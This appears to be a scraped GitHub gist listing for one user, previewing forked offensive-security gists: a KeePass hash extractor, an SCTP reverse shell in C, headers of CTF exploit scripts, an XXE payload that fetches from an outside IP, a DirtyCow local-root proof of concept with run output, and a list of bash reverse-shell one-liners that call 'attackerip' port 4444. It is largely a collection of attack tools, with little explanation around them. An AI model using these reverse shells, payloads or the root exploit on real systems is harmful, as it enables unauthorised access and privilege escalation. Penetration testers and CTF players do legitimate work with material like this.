waywardsun /
Created Dec 21, 2017 — forked from HarmJ0y/
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License
waywardsun / reverse_sctp_shell.c
Created Aug 11, 2017 — forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
waywardsun /
Created Jun 19, 2017 — forked from saelo/
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
# Exploit for "assignment" of GoogleCTF 2017
# CTF-quality exploit...
# Slightly simplified and shortened explanation:
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
waywardsun /
Created Jun 1, 2017 — forked from m1ghtym0/
POC exploit for toilet service of FAUST-CTF-2017
#!/usr/bin/env python2
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit
waywardsun /
Created May 17, 2017 — forked from trietptm/
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

View gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
official docs:
some tutorials from the internet:
waywardsun / cowroot.c
Created Oct 21, 2016 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
* (un)comment correct payload first (x86 or x64)!
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
View reverse_shells
bash -i >& /dev/tcp/ 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3